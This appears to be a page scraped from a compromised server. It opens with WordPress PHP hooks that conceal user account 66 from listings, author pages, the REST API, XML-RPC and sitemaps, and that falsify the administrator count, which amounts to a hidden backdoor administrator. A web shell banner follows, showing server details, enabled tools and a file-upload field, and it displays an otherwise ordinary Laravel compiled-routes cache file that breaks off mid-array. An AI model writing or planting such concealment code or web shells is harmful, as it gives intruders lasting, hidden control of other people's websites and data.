add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/futuresfunder/bootstrap/cache/ |
Upload File : |
<?php
app('router')->setCompiledRoutes(
array (
'compiled' =>
array (
0 => false,
1 =>
array (
'/livewire/update' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'default.livewire.update',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/livewire/livewire.min.js' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'generated::rQzoV4wz00QwMQ8v',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/livewire/livewire.min.js.map' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'generated::8KYyHT0riCLm2epH',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/livewire/upload-file' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'livewire.upload-file',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/up' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'generated::skqGO3qistQQcvag',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'home',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/impressum' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'legal.impressum',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/terms' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'legal.terms',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/privacy' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'legal.privacy',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/dashboard' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'dashboard',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/contribute' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'contribute.create',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/contribute/source' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'contribute.source',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/contributions' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'contribute.index',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/admin/moderation' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'admin.moderation',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/profile' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'profile.edit',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
1 =>
array (
0 =>
array (
'_route' => 'profile.update',
),
1 => NULL,
2 =>
array (
'PATCH' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
2 =>
array (
0 =>
array (
'_route' => 'profile.destroy',
),
1 => NULL,
2 =>
array (
'DELETE' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/register' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'register',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
1 =>
array (
0 =>
array (
'_route' => 'generated::CVKch6DvNloSkAWy',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/login' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'login',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
1 =>
array (
0 =>
array (
'_route' => 'generated::gbsjK4cpEHft22Nv',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/forgot-password' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'password.request',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
1 =>
array (
0 =>
array (
'_route' => 'password.email',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/reset-password' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'password.store',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/verify-email' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'verification.notice',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/email/verification-notification' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'verification.send',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/confirm-password' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'password.confirm',
),
1 => NULL,
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
1 =>
array (
0 =>
array (
'_route' => 'generated::DmlkrwcDggqengeg',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/password' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'password.update',
),
1 => NULL,
2 =>
array (
'PUT' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
'/logout' =>
array (
0 =>
array (
0 =>
array (
'_route' => 'logout',
),
1 => NULL,
2 =>
array (
'POST' => 0,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
),
2 =>
array (
0 => '{^(?|/livewire/preview\\-file/([^/]++)(*:39)|/programs/([^/]++)(*:64)|/funders/([^/]++)(*:88)|/contributions/([^/]++)/edit(*:123)|/reset\\-password/([^/]++)(*:156)|/verify\\-email/([^/]++)/([^/]++)(*:196)|/storage/(.*)(?|(*:220)))/?$}sDu',
),
3 =>
array (
39 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'livewire.preview-file',
),
1 =>
array (
0 => 'filename',
),
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
),
64 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'programs.show',
),
1 =>
array (
0 => 'program',
),
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
),
88 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'funders.show',
),
1 =>
array (
0 => 'funder',
),
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
),
123 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'contribute.edit',
),
1 =>
array (
0 => 'program',
),
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => false,
6 => NULL,
),
),
156 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'password.reset',
),
1 =>
array (
0 => 'token',
),
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
),
196 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'verification.verify',
),
1 =>
array (
0 => 'id',
1 => 'hash',
),
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
),
220 =>
array (
0 =>
array (
0 =>
array (
'_route' => 'storage.local',
),
1 =>
array (
0 => 'path',
),
2 =>
array (
'GET' => 0,
'HEAD' => 1,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
1 =>
array (
0 =>
array (
'_route' => 'storage.local.upload',
),
1 =>
array (
0 => 'path',
),
2 =>
array (
'PUT' => 0,
),
3 => NULL,
4 => false,
5 => true,
6 => NULL,
),
2 =>
array (
0 => NULL,
1 => NULL,
2 => NULL,
3 => NULL,
4 => false,
5 => false,
6 => 0,
),
),
),
4 => NULL,
),
'attributes' =>
array (
'default.livewire.update' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'livewire/update',
'action' =>
array (
'uses' => 'Livewire\\Mechanisms\\HandleRequests\\HandleRequests@handleUpdate',
'controller' => 'Livewire\\Mechanisms\\HandleRequests\\HandleRequests@handleUpdate',
'middleware' =>
array (
0 => 'web',
),
'as' => 'default.livewire.update',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'generated::rQzoV4wz00QwMQ8v' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'livewire/livewire.min.js',
'action' =>
array (
'uses' => 'Livewire\\Mechanisms\\FrontendAssets\\FrontendAssets@returnJavaScriptAsFile',
'controller' => 'Livewire\\Mechanisms\\FrontendAssets\\FrontendAssets@returnJavaScriptAsFile',
'as' => 'generated::rQzoV4wz00QwMQ8v',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'generated::8KYyHT0riCLm2epH' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'livewire/livewire.min.js.map',
'action' =>
array (
'uses' => 'Livewire\\Mechanisms\\FrontendAssets\\FrontendAssets@maps',
'controller' => 'Livewire\\Mechanisms\\FrontendAssets\\FrontendAssets@maps',
'as' => 'generated::8KYyHT0riCLm2epH',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'livewire.upload-file' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'livewire/upload-file',
'action' =>
array (
'uses' => 'Livewire\\Features\\SupportFileUploads\\FileUploadController@handle',
'controller' => 'Livewire\\Features\\SupportFileUploads\\FileUploadController@handle',
'as' => 'livewire.upload-file',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'livewire.preview-file' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'livewire/preview-file/{filename}',
'action' =>
array (
'uses' => 'Livewire\\Features\\SupportFileUploads\\FilePreviewController@handle',
'controller' => 'Livewire\\Features\\SupportFileUploads\\FilePreviewController@handle',
'as' => 'livewire.preview-file',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'generated::skqGO3qistQQcvag' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'up',
'action' =>
array (
'uses' => 'O:55:"Laravel\\SerializableClosure\\UnsignedSerializableClosure":1:{s:12:"serializable";O:46:"Laravel\\SerializableClosure\\Serializers\\Native":5:{s:3:"use";a:0:{}s:8:"function";s:1123:"function (\\Illuminate\\Http\\Request $request) {
$exception = null;
try {
\\Illuminate\\Support\\Facades\\Event::dispatch(new \\Illuminate\\Foundation\\Events\\DiagnosingHealth);
} catch (\\Throwable $e) {
if (app()->hasDebugModeEnabled()) {
throw $e;
}
report($e);
$exception = $e->getMessage();
}
$status = $exception ? 500 : 200;
if ($request->expectsJson()) {
return response()->json([
\'status\' => $exception ? \'down\' : \'up\',
], $status);
}
return response(\\Illuminate\\Support\\Facades\\View::file(\'/var/www/html/futuresfunder/vendor/laravel/framework/src/Illuminate/Foundation/Configuration\'.\'/../resources/health-up.blade.php\', [
\'exception\' => $exception,
]), status: $status);
}";s:5:"scope";s:54:"Illuminate\\Foundation\\Configuration\\ApplicationBuilder";s:4:"this";N;s:4:"self";s:32:"00000000000004760000000000000000";}}',
'as' => 'generated::skqGO3qistQQcvag',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'home' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => '/',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => 'App\\Livewire\\Directory\\ProgramBrowser@__invoke',
'controller' => 'App\\Livewire\\Directory\\ProgramBrowser',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'home',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'programs.show' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'programs/{program}',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => 'App\\Livewire\\Directory\\ProgramShow@__invoke',
'controller' => 'App\\Livewire\\Directory\\ProgramShow',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'programs.show',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'funders.show' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'funders/{funder}',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => 'App\\Livewire\\Directory\\FunderShow@__invoke',
'controller' => 'App\\Livewire\\Directory\\FunderShow',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'funders.show',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'legal.impressum' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'impressum',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => '\\Illuminate\\Routing\\ViewController@__invoke',
'controller' => '\\Illuminate\\Routing\\ViewController',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'legal.impressum',
),
'fallback' => false,
'defaults' =>
array (
'view' => 'legal.impressum',
'data' =>
array (
),
'status' => 200,
'headers' =>
array (
),
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'legal.terms' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'terms',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => '\\Illuminate\\Routing\\ViewController@__invoke',
'controller' => '\\Illuminate\\Routing\\ViewController',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'legal.terms',
),
'fallback' => false,
'defaults' =>
array (
'view' => 'legal.terms',
'data' =>
array (
),
'status' => 200,
'headers' =>
array (
),
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'legal.privacy' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'privacy',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => '\\Illuminate\\Routing\\ViewController@__invoke',
'controller' => '\\Illuminate\\Routing\\ViewController',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'legal.privacy',
),
'fallback' => false,
'defaults' =>
array (
'view' => 'legal.privacy',
'data' =>
array (
),
'status' => 200,
'headers' =>
array (
),
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'dashboard' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'dashboard',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
),
'uses' => 'O:55:"Laravel\\SerializableClosure\\UnsignedSerializableClosure":1:{s:12:"serializable";O:46:"Laravel\\SerializableClosure\\Serializers\\Native":5:{s:3:"use";a:0:{}s:8:"function";s:35:"fn () => \\redirect()->route(\'home\')";s:5:"scope";s:37:"Illuminate\\Routing\\RouteFileRegistrar";s:4:"this";N;s:4:"self";s:32:"00000000000004780000000000000000";}}',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'dashboard',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'contribute.create' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'contribute',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
),
'uses' => 'App\\Livewire\\Contribute\\ProgramForm@__invoke',
'controller' => 'App\\Livewire\\Contribute\\ProgramForm',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'contribute.create',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'contribute.source' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'contribute/source',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
),
'uses' => 'App\\Livewire\\Contribute\\SourceForm@__invoke',
'controller' => 'App\\Livewire\\Contribute\\SourceForm',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'contribute.source',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'contribute.index' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'contributions',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
),
'uses' => 'App\\Livewire\\Contribute\\MyContributions@__invoke',
'controller' => 'App\\Livewire\\Contribute\\MyContributions',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'contribute.index',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'contribute.edit' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'contributions/{program}/edit',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
),
'uses' => 'App\\Livewire\\Contribute\\ProgramForm@__invoke',
'controller' => 'App\\Livewire\\Contribute\\ProgramForm',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'contribute.edit',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.moderation' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'admin/moderation',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
),
'uses' => 'App\\Livewire\\Admin\\ModerationQueue@__invoke',
'controller' => 'App\\Livewire\\Admin\\ModerationQueue',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'admin.moderation',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'profile.edit' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'profile',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
),
'uses' => 'App\\Http\\Controllers\\ProfileController@edit',
'controller' => 'App\\Http\\Controllers\\ProfileController@edit',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'profile.edit',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'profile.update' =>
array (
'methods' =>
array (
0 => 'PATCH',
),
'uri' => 'profile',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
),
'uses' => 'App\\Http\\Controllers\\ProfileController@update',
'controller' => 'App\\Http\\Controllers\\ProfileController@update',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'profile.update',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'profile.destroy' =>
array (
'methods' =>
array (
0 => 'DELETE',
),
'uri' => 'profile',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
),
'uses' => 'App\\Http\\Controllers\\ProfileController@destroy',
'controller' => 'App\\Http\\Controllers\\ProfileController@destroy',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'profile.destroy',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'register' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'register',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'guest',
),
'uses' => 'App\\Http\\Controllers\\Auth\\RegisteredUserController@create',
'controller' => 'App\\Http\\Controllers\\Auth\\RegisteredUserController@create',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'register',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'generated::CVKch6DvNloSkAWy' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'register',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'guest',
),
'uses' => 'App\\Http\\Controllers\\Auth\\RegisteredUserController@store',
'controller' => 'App\\Http\\Controllers\\Auth\\RegisteredUserController@store',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'generated::CVKch6DvNloSkAWy',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'login' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'login',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'guest',
),
'uses' => 'App\\Http\\Controllers\\Auth\\AuthenticatedSessionController@create',
'controller' => 'App\\Http\\Controllers\\Auth\\AuthenticatedSessionController@create',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'login',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'generated::gbsjK4cpEHft22Nv' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'login',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'guest',
),
'uses' => 'App\\Http\\Controllers\\Auth\\AuthenticatedSessionController@store',
'controller' => 'App\\Http\\Controllers\\Auth\\AuthenticatedSessionController@store',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'generated::gbsjK4cpEHft22Nv',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'password.request' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'forgot-password',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'guest',
),
'uses' => 'App\\Http\\Controllers\\Auth\\PasswordResetLinkController@create',
'controller' => 'App\\Http\\Controllers\\Auth\\PasswordResetLinkController@create',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'password.request',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'password.email' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'forgot-password',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'guest',
),
'uses' => 'App\\Http\\Controllers\\Auth\\PasswordResetLinkController@store',
'controller' => 'App\\Http\\Controllers\\Auth\\PasswordResetLinkController@store',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'password.email',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'password.reset' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'reset-password/{token}',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'guest',
),
'uses' => 'App\\Http\\Controllers\\Auth\\NewPasswordController@create',
'controller' => 'App\\Http\\Controllers\\Auth\\NewPasswordController@create',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'password.reset',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
